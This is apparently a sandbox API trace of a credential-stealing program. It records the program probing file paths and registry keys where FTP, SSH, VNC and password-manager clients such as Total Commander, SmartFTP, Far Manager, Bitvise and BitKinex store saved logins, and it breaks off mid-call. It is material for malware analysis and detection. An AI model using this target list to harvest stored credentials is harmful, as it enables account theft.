0x76300000 [0184.020] wvsprintfW (in: param_1=0x875288, param_2="%s\\NetDrive2\\drives.dat", arglist=0x19f82c | out: param_1="C:\\ProgramData\\NetDrive2\\drives.dat") returned 35 [0184.020] GetProcessHeap () returned 0x840000 [0184.020] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4a) returned 0x861ea8 [0184.020] GetProcessHeap () returned 0x840000 [0184.020] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.021] PathFileExistsW (pszPath="C:\\ProgramData\\NetDrive2\\drives.dat") returned 0 [0184.021] GetProcessHeap () returned 0x840000 [0184.021] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861ea8 | out: hHeap=0x840000) returned 1 [0184.021] GetProcessHeap () returned 0x840000 [0184.021] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.021] GetProcessHeap () returned 0x840000 [0184.021] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.022] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.022] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Windows") returned 0x0 [0184.022] GetProcessHeap () returned 0x840000 [0184.022] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5c) returned 0x875288 [0184.023] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.024] wvsprintfW (in: param_1=0x875288, param_2="%s\\wcx_ftp.ini", arglist=0x19f840 | out: param_1="C:\\Windows\\wcx_ftp.ini") returned 22 [0184.024] GetProcessHeap () returned 0x840000 [0184.024] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x30) returned 0x8697a8 [0184.024] GetProcessHeap () returned 0x840000 [0184.024] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.025] PathFileExistsW (pszPath="C:\\Windows\\wcx_ftp.ini") returned 0 [0184.025] GetProcessHeap () returned 0x840000 [0184.025] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8697a8 | out: hHeap=0x840000) returned 1 [0184.025] GetProcessHeap () returned 0x840000 [0184.025] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.025] GetProcessHeap () returned 0x840000 [0184.025] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5c) returned 0x875288 [0184.026] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.027] wvsprintfW (in: param_1=0x875288, param_2="%s\\wcx_ftp.ini", arglist=0x19f834 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 49 [0184.027] GetProcessHeap () returned 0x840000 [0184.027] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x66) returned 0x871d38 [0184.027] GetProcessHeap () returned 0x840000 [0184.027] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.028] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 0 [0184.028] GetProcessHeap () returned 0x840000 [0184.028] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0184.028] GetProcessHeap () returned 0x840000 [0184.028] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.029] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.031] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0184.031] GetProcessHeap () returned 0x840000 [0184.031] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5c) returned 0x875288 [0184.032] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.033] wvsprintfW (in: param_1=0x875288, param_2="%s\\wcx_ftp.ini", arglist=0x19f828 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 33 [0184.033] GetProcessHeap () returned 0x840000 [0184.033] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x46) returned 0x86d4c8 [0184.033] GetProcessHeap () returned 0x840000 [0184.033] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.034] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 0 [0184.034] GetProcessHeap () returned 0x840000 [0184.034] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86d4c8 | out: hHeap=0x840000) returned 1 [0184.034] GetProcessHeap () returned 0x840000 [0184.034] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.034] GetProcessHeap () returned 0x840000 [0184.034] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6c) returned 0x875288 [0184.035] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.036] wvsprintfW (in: param_1=0x875288, param_2="%s\\GHISLER\\wcx_ftp.ini", arglist=0x19f81c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 57 [0184.036] GetProcessHeap () returned 0x840000 [0184.036] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x76) returned 0x860b98 [0184.036] GetProcessHeap () returned 0x840000 [0184.036] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.037] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 0 [0184.037] GetProcessHeap () returned 0x840000 [0184.037] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x860b98 | out: hHeap=0x840000) returned 1 [0184.037] GetProcessHeap () returned 0x840000 [0184.037] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x873a58 [0184.038] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.038] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Ghisler\\Total Commander", pszValue="FtpIniName", pdwType=0x0, pvData=0x873a58, pcbData=0x19f81c*=0x104 | out: pdwType=0x0, pvData=0x873a58, pcbData=0x19f81c*=0x104) returned 0x2 [0184.038] GetProcessHeap () returned 0x840000 [0184.038] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.038] GetProcessHeap () returned 0x840000 [0184.038] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.039] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.040] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0184.040] GetProcessHeap () returned 0x840000 [0184.040] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f56) returned 0x875288 [0184.041] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.041] wvsprintfW (in: param_1=0x875288, param_2="%s\\SmartFTP", arglist=0x19f83c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP") returned 46 [0184.042] GetProcessHeap () returned 0x840000 [0184.042] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x60) returned 0x871d38 [0184.042] GetProcessHeap () returned 0x840000 [0184.042] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.042] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP") returned 0 [0184.043] GetProcessHeap () returned 0x840000 [0184.043] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.043] GetProcessHeap () returned 0x840000 [0184.043] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0184.043] GetProcessHeap () returned 0x840000 [0184.043] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x873a58 [0184.043] GetProcessHeap () returned 0x840000 [0184.043] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x872310 [0184.043] GetProcessHeap () returned 0x840000 [0184.043] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0184.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0184.045] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Far\\Plugins\\FTP\\Hosts", phkResult=0x871b08 | out: phkResult=0x871b08*=0x0) returned 0x2 [0184.045] GetProcessHeap () returned 0x840000 [0184.045] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0184.045] GetProcessHeap () returned 0x840000 [0184.045] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c38 [0184.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0184.046] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Far2\\Plugins\\FTP\\Hosts", phkResult=0x871c38 | out: phkResult=0x871c38*=0x0) returned 0x2 [0184.046] GetProcessHeap () returned 0x840000 [0184.046] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c38 | out: hHeap=0x840000) returned 1 [0184.046] GetProcessHeap () returned 0x840000 [0184.046] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.047] GetProcessHeap () returned 0x840000 [0184.047] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872310 | out: hHeap=0x840000) returned 1 [0184.047] GetProcessHeap () returned 0x840000 [0184.047] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3fd4) returned 0x87a228 [0184.048] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.048] wvsprintfW (in: param_1=0x87a228, param_2="%s\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db", arglist=0x19f848 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db") returned 109 [0184.049] GetProcessHeap () returned 0x840000 [0184.049] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xde) returned 0x871d38 [0184.049] GetProcessHeap () returned 0x840000 [0184.049] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0184.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.049] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db") returned 0 [0184.050] GetProcessHeap () returned 0x840000 [0184.050] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0184.050] GetProcessHeap () returned 0x840000 [0184.050] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.051] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.051] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0184.052] Sleep (dwMilliseconds=0xa) [0184.070] GetProcessHeap () returned 0x840000 [0184.070] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x875288 [0184.071] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.072] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s", arglist=0x19f5b4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.tlp") returned 37 [0184.072] GetProcessHeap () returned 0x840000 [0184.072] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4e) returned 0x861fb0 [0184.072] GetProcessHeap () returned 0x840000 [0184.072] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.073] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.tlp", lpFindFileData=0x19f5c8 | out: lpFindFileData=0x19f5c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x84a940, ftLastWriteTime.dwHighDateTime=0x84a940, nFileSizeHigh=0x865c50, nFileSizeLow=0x865e68, dwReserved0=0x0, dwReserved1=0x19f624, cFileName="ը眩", cAlternateFileName="뒭蕬͈읩꿟憫\x19䂑@")) returned 0xffffffff [0184.073] GetProcessHeap () returned 0x840000 [0184.073] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861fb0 | out: hHeap=0x840000) returned 1 [0184.073] GetProcessHeap () returned 0x840000 [0184.073] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.073] GetProcessHeap () returned 0x840000 [0184.073] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.074] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.075] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0184.076] Sleep (dwMilliseconds=0xa) [0184.093] GetProcessHeap () returned 0x840000 [0184.093] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x875288 [0184.133] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.283] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s", arglist=0x19f59c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.bscp") returned 38 [0184.283] GetProcessHeap () returned 0x840000 [0184.283] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x50) returned 0x862428 [0184.283] GetProcessHeap () returned 0x840000 [0184.283] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.284] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.bscp", lpFindFileData=0x19f5b0 | out: lpFindFileData=0x19f5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x84a940, ftLastWriteTime.dwHighDateTime=0x84a940, nFileSizeHigh=0x865c50, nFileSizeLow=0x865c70, dwReserved0=0x0, dwReserved1=0x19f60c, cFileName="ը眩", cAlternateFileName="뒭蕬͈읩꾷憫\x19䂑@")) returned 0xffffffff [0184.284] GetProcessHeap () returned 0x840000 [0184.284] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x862428 | out: hHeap=0x840000) returned 1 [0184.284] GetProcessHeap () returned 0x840000 [0184.284] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.284] GetProcessHeap () returned 0x840000 [0184.284] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x873a58 [0184.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.285] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Bitvise\\BvSshClient", pszValue="LastUsedProfile", pdwType=0x0, pvData=0x873a58, pcbData=0x19f81c*=0x104 | out: pdwType=0x0, pvData=0x873a58, pcbData=0x19f81c*=0x104) returned 0x2 [0184.286] GetProcessHeap () returned 0x840000 [0184.286] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.286] GetProcessHeap () returned 0x840000 [0184.286] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.286] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.287] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0184.289] Sleep (dwMilliseconds=0xa) [0184.334] GetProcessHeap () returned 0x840000 [0184.334] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x875288 [0184.336] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.337] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s", arglist=0x19f5a8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.vnc") returned 37 [0184.337] GetProcessHeap () returned 0x840000 [0184.337] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4e) returned 0x8622c8 [0184.337] GetProcessHeap () returned 0x840000 [0184.337] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.338] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.vnc", lpFindFileData=0x19f5bc | out: lpFindFileData=0x19f5bc*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x84a940, ftLastWriteTime.dwLowDateTime=0x84a940, ftLastWriteTime.dwHighDateTime=0x865c50, nFileSizeHigh=0x866210, nFileSizeLow=0x0, dwReserved0=0x19f614, dwReserved1=0x77290568, cFileName="", cAlternateFileName="͈읩꿏憫")) returned 0xffffffff [0184.338] GetProcessHeap () returned 0x840000 [0184.338] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8622c8 | out: hHeap=0x840000) returned 1 [0184.338] GetProcessHeap () returned 0x840000 [0184.338] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.338] GetProcessHeap () returned 0x840000 [0184.338] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.339] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.340] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0184.342] Sleep (dwMilliseconds=0xa) [0184.357] GetProcessHeap () returned 0x840000 [0184.357] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x875288 [0184.358] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.359] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s", arglist=0x19f590 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.vnc") returned 35 [0184.359] GetProcessHeap () returned 0x840000 [0184.359] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4a) returned 0x862428 [0184.359] GetProcessHeap () returned 0x840000 [0184.359] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.359] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.vnc", lpFindFileData=0x19f5a4 | out: lpFindFileData=0x19f5a4*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x84a940, ftLastWriteTime.dwLowDateTime=0x84a940, ftLastWriteTime.dwHighDateTime=0x865c50, nFileSizeHigh=0x865c70, nFileSizeLow=0x0, dwReserved0=0x19f5fc, dwReserved1=0x77290568, cFileName="", cAlternateFileName="螚䇆꾧憫")) returned 0xffffffff [0184.365] GetProcessHeap () returned 0x840000 [0184.365] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x862428 | out: hHeap=0x840000) returned 1 [0184.365] GetProcessHeap () returned 0x840000 [0184.365] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.365] GetProcessHeap () returned 0x840000 [0184.365] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.366] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.367] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0184.367] GetProcessHeap () returned 0x840000 [0184.367] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f54) returned 0x875288 [0184.368] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.369] wvsprintfW (in: param_1=0x875288, param_2="%s\\mSecure", arglist=0x19f80c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\mSecure") returned 39 [0184.369] GetProcessHeap () returned 0x840000 [0184.369] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x52) returned 0x871d98 [0184.369] GetProcessHeap () returned 0x840000 [0184.369] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.370] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\mSecure") returned 0 [0184.371] GetProcessHeap () returned 0x840000 [0184.371] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.371] GetProcessHeap () returned 0x840000 [0184.371] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0184.371] GetProcessHeap () returned 0x840000 [0184.371] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.372] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.372] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\ProgramData") returned 0x0 [0184.372] GetProcessHeap () returned 0x840000 [0184.372] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f58) returned 0x875288 [0184.373] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.374] wvsprintfW (in: param_1=0x875288, param_2="%s\\Syncovery", arglist=0x19f83c | out: param_1="C:\\ProgramData\\Syncovery") returned 24 [0184.374] GetProcessHeap () returned 0x840000 [0184.374] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x34) returned 0x866bf0 [0184.374] GetProcessHeap () returned 0x840000 [0184.374] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.375] PathFileExistsW (pszPath="C:\\ProgramData\\Syncovery") returned 0 [0184.381] GetProcessHeap () returned 0x840000 [0184.381] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.381] GetProcessHeap () returned 0x840000 [0184.381] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x866bf0 | out: hHeap=0x840000) returned 1 [0184.381] GetProcessHeap () returned 0x840000 [0184.381] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.383] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.384] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0184.384] GetProcessHeap () returned 0x840000 [0184.384] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0184.385] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.386] wvsprintfW (in: param_1=0x875288, param_2="%s\\FreshWebmaster\\FreshFTP\\FtpSites.SMF", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\FreshWebmaster\\FreshFTP\\FtpSites.SMF") returned 59 [0184.386] GetProcessHeap () returned 0x840000 [0184.386] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7a) returned 0x871d98 [0184.386] GetProcessHeap () returned 0x840000 [0184.386] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.388] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.389] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FreshWebmaster\\FreshFTP\\FtpSites.SMF") returned 0 [0184.389] GetProcessHeap () returned 0x840000 [0184.389] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0184.389] GetProcessHeap () returned 0x840000 [0184.389] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.389] GetProcessHeap () returned 0x840000 [0184.390] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6e) returned 0x875288 [0184.401] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.402] wvsprintfW (in: param_1=0x875288, param_2="%s\\BitKinex\\bitkinex.ds", arglist=0x19f848 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BitKinex\\bitkinex.ds") returned 58 [0184.403] GetProcessHeap () returned 0x840000 [0184.403] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x78) returned 0x860c98 [0184.403] GetProcessHeap () returned 0x840000 [0184.403] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.404] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BitKinex\\bitkinex.ds") returned 0 [0184.405] GetProcessHeap () returned 0x840000 [0184.405] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x860c98 | out: hHeap=0x840000) returned 1 [0184.405] GetProcessHeap () returned 0x840000 [0184.405] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6a) returned 0x875288 [0184.405] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.407] wvsprintfW (in: param_1=0x875288, param_2="%s\\UltraFXP\\sites.xml", arglist=0x19f848 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UltraFXP\\sites.xml") returned 56 [0184.407] GetProcessHeap () returned 0x840000 [0184.407] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x74) returned 0x860c98 [0184.407] GetProcessHeap () returned 0x840000 [0184.407] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.415] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UltraFXP\\sites.xml") returned 0 [0184.416] GetProcessHeap () returned 0x840000 [0184.416] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x860c98 | out: hHeap=0x840000) returned 1 [0184.416] GetProcessHeap () returned 0x840000 [0184.416] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f68) returned 0x875288 [0184.417] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.418] wvsprintfW (in: param_1=0x875288, param_2="%s\\FTP Now\\sites.xml", arglist=0x19f848 | out: 